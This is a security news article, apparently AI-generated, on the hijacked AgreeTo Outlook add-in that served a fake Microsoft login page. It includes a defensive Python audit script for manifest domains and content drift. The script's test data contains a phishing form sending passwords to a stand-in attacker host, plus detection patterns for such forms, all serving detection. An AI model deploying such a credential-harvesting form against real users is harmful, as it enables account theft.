Ethical Hacking News
A malicious Microsoft Outlook add-in, AgreeTo, has been found stealing more than 4,000 credentials from unsuspecting users. The add-in was distributed through Microsoft's own store and was not malicious when it was published: its developer abandoned it, an attacker claimed the domain from which it loaded its content, and the add-in began serving a fake Microsoft login page. The case exposes a blind spot in how Office add-ins are reviewed, since a manifest only declares URLs and the content behind them is not re-checked after approval, and it repeats a pattern already seen in browser extensions, npm packages and IDE plugins.
The discovery, reported as the first known malicious Outlook add-in, draws attention to a weakness in the Office add-in supply chain rather than a bug in Outlook itself. The attacker claimed the domain associated with a now-abandoned legitimate add-in and used it to serve a fake Microsoft login page, stealing over 4,000 credentials from unsuspecting users.
Office add-ins are distributed through Microsoft's own store and therefore carry implicit trust, which makes the way they are loaded worth watching closely. An add-in's manifest does not contain the add-in's code; it declares URLs, and Outlook fetches the add-in's pages and scripts from those URLs on the developer's servers each time it runs. Whatever Microsoft reviewed at submission is therefore not necessarily what users are running today, and whoever controls the declared domain controls the add-in.
The add-in in question, AgreeTo, was advertised by its developer as a way to connect different calendars in one place and share availability through email. It was last updated in December 2022, and the developer appears to have abandoned the project, allowing the attacker to take control of the domain and serve a phishing kit in place of the original add-in content.
The attack exploited the absence of periodic content monitoring for add-ins already published to the marketplace: once approved, the URLs an add-in points to are not re-checked, leaving Microsoft and its users exposed. The pattern is not unique to Office; similar attacks have been seen against browser extensions, npm packages, and IDE plugins.
The impact goes beyond the individual user and points to a broader supply chain problem. As companies increasingly rely on remotely hosted, dynamically loaded dependencies, they need a more proactive approach to vetting add-ins and other software components, and to monitoring them after installation rather than only at install time.
Idan Dardikman, co-founder and CTO of Koi Security, warned that "this is the same class of attack we've seen in browser extensions, npm packages, and IDE plugins: a trusted distribution channel where the content can change after approval." He added that "what makes Office add-ins particularly concerning is the combination of factors: they run inside Outlook, where users handle their most sensitive communications, they can request permissions to read and modify emails, and they're distributed through Microsoft's own store, which carries implicit trust."
Microsoft has responded by removing the malicious add-in from its store and advising affected users to remove it and reset their account passwords. The incident nonetheless serves as a reminder that supply chain security is an ongoing challenge that requires continuous monitoring rather than a one-time review.
In response to this incident, Koi Security recommends several steps Microsoft could take to close the gap:
* Trigger a re-review when an add-in's declared URL starts returning content different from what was reviewed
* Verify that the domains declared in an add-in's manifest are owned by the add-in's developer
* Delist or flag add-ins that have not been updated within a defined period
* Display installation counts so that the impact of a compromised add-in can be assessed
These measures would narrow the gap between what was reviewed and what users actually run, and would make it harder for an abandoned add-in to be silently repurposed.
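The script below is added here as an illustration and is not code from Koi Security, Microsoft or the AgreeTo add-in. It shows what the manifest blind spot described above and the first two recommendations look like in practice: it pulls every URL an Office add-in manifest declares, checks that the registrable domains behind them are still registered to the developer of record (or have lapsed and are free to claim), and fingerprints each declared page so that a change from the reviewed content, here the appearance of a password form posting to an undeclared host, is flagged for re-review. The manifest, the WHOIS records and the HTTP bodies are constructed stand-ins so that it runs offline; names such as example-calendar.test, Squatter Ltd and login.attacker.test are assumptions for the example, not anything from the incident.

```python
"""Audit an Office add-in manifest for the review blind spot described above.
Assumptions (not from the article): SAMPLE_MANIFEST is a constructed manifest in
the shape Office add-ins use, not AgreeTo's; REGISTRY and the HTML bodies stand
in for WHOIS/RDAP and HTTP so the script runs offline."""
import hashlib
import re
import xml.etree.ElementTree as ET
from datetime import date
from urllib.parse import urlparse

SAMPLE_MANIFEST = """\
<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
           xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0">
  <ProviderName>Example Dev</ProviderName>
  <DefaultSettings>
    <SourceLocation DefaultValue="https://app.example-calendar.test/taskpane.html"/>
  </DefaultSettings>
  <Permissions>ReadWriteMailbox</Permissions>
  <AppDomains><AppDomain>https://cdn.example-calendar.test</AppDomain></AppDomains>
  <VersionOverrides xmlns="http://schemas.microsoft.com/office/mailappversionoverrides">
    <Resources><bt:Urls>
      <bt:Url id="Taskpane.Url" DefaultValue="https://app.example-calendar.test/taskpane.html"/>
      <bt:Url id="Commands.Url" DefaultValue="https://app.example-calendar.test/commands.html"/>
    </bt:Urls></Resources>
  </VersionOverrides>
</OfficeApp>
"""

def extract_urls(manifest_xml: str) -> set[str]:
    # Everything Outlook will load at run time: SourceLocation, bt:Url entries, AppDomains.
    urls: set[str] = set()
    for elem in ET.fromstring(manifest_xml).iter():
        value = elem.attrib.get("DefaultValue", "")
        if value.startswith(("http://", "https://")):
            urls.add(value)
        if elem.tag.endswith("}AppDomain") and (elem.text or "").strip():
            urls.add(elem.text.strip())
    return urls

def registrable_domain(url: str) -> str:
    # Simplification: last two labels; production code should use the public suffix list.
    return ".".join((urlparse(url).hostname or "").split(".")[-2:])

def registration_findings(urls, developer, lookup, today) -> list[str]:
    # Recommendation 2: is each declared domain still held by the developer, and not about to lapse?
    findings = []
    for domain in sorted({registrable_domain(u) for u in urls}):
        rec = lookup(domain)
        if rec is None:
            findings.append(f"{domain}: not registered (free for anyone to claim)")
            continue
        if rec["registrant"] != developer:
            findings.append(f"{domain}: registrant is {rec['registrant']!r}, not {developer!r}")
        if (rec["expires"] - today).days < 60:
            findings.append(f"{domain}: expires in {(rec['expires'] - today).days} days")
    return findings

def credential_form_indicators(body: bytes, declared_hosts) -> list[str]:
    # Cheap signals that reviewed content has turned into a phishing kit.
    html = body.decode("utf-8", "replace")
    hits = []
    if re.search(r"type=['\"]password['\"]", html, re.I):
        hits.append("password field present")
    for action in re.findall(r"action=['\"]([^'\"]+)['\"]", html, re.I):
        host = urlparse(action).hostname
        if host and host not in declared_hosts:
            hits.append(f"form posts to undeclared host {host}")
    return hits

def drift_findings(baseline, fetch, declared_hosts) -> list[str]:
    # Recommendation 1: flag any declared URL whose SHA-256 no longer matches the review-time digest.
    findings = []
    for url, reviewed in sorted(baseline.items()):
        body = fetch(url)
        if body is None:
            findings.append(f"{url}: unreachable")
        elif hashlib.sha256(body).hexdigest() != reviewed:
            why = credential_form_indicators(body, declared_hosts) or ["content changed"]
            findings.append(f"{url}: " + "; ".join(why))
    return findings

# Constructed stand-ins: what the reviewer saw at submission vs. what is live now.
REVIEWED_BODY = b"<html><body><h1>Connect your calendars</h1></body></html>"
PHISHING_BODY = (b"<html><body><h1>Sign in to Microsoft</h1>"
                 b"<form method='post' action='https://login.attacker.test/collect'>"
                 b"<input name='user'><input type='password' name='pass'></form></body></html>")
REGISTRY = {"example-calendar.test": {"registrant": "Squatter Ltd", "expires": date(2027, 1, 1)}}
LIVE_SITE = {"https://app.example-calendar.test/taskpane.html": PHISHING_BODY,
             "https://app.example-calendar.test/commands.html": REVIEWED_BODY}

def audit(manifest_xml=SAMPLE_MANIFEST, developer="Example Dev", lookup=REGISTRY.get,
          fetch=LIVE_SITE.get, today=date(2026, 2, 18)) -> dict:
    urls = extract_urls(manifest_xml)
    hosts = {urlparse(u).hostname for u in urls}
    # Baseline as recorded at review time (constructed: every page served REVIEWED_BODY then).
    baseline = {u: hashlib.sha256(REVIEWED_BODY).hexdigest()
                for u in urls if urlparse(u).path.endswith(".html")}
    return {"hosts": sorted(hosts),
            "registration": registration_findings(urls, developer, lookup, today),
            "drift": drift_findings(baseline, fetch, hosts)}
```

Calling `audit()` on the constructed data reports the domain as registered to someone other than the developer of record and the task pane URL as drifted into a credential form posting off-domain; `commands.html`, which still serves the reviewed content, is silent. To use it against a real add-in, replace `lookup` with an RDAP/WHOIS client and `fetch` with an HTTP client, and record the baseline digests at review or install time rather than from `REVIEWED_BODY`.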
Summary:
A malicious Microsoft Outlook add-in, AgreeTo, was found stealing over 4,000 credentials after an attacker claimed the abandoned domain its manifest pointed to and served a fake Microsoft login page. Because Office add-ins are distributed through Microsoft's own store and carry implicit trust, while their content is loaded live from developer-controlled URLs that are not re-checked after approval, the incident underlines the need for continuous monitoring of add-ins and for stronger supply chain security.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Lurking-Threat-of-Unattended-Office-Add-ins-A-Cautionary-Tale-of-Supply-Chain-Security-ehn.shtml
https://thehackernews.com/2026/02/first-malicious-outlook-add-in-found.html
https://www.bleepingcomputer.com/news/security/microsoft-store-outlook-add-in-hijacked-to-steal-4-000-microsoft-accounts/
Published: Wed Feb 18 17:52:41 2026 by llama3.2 3B Q4_K_M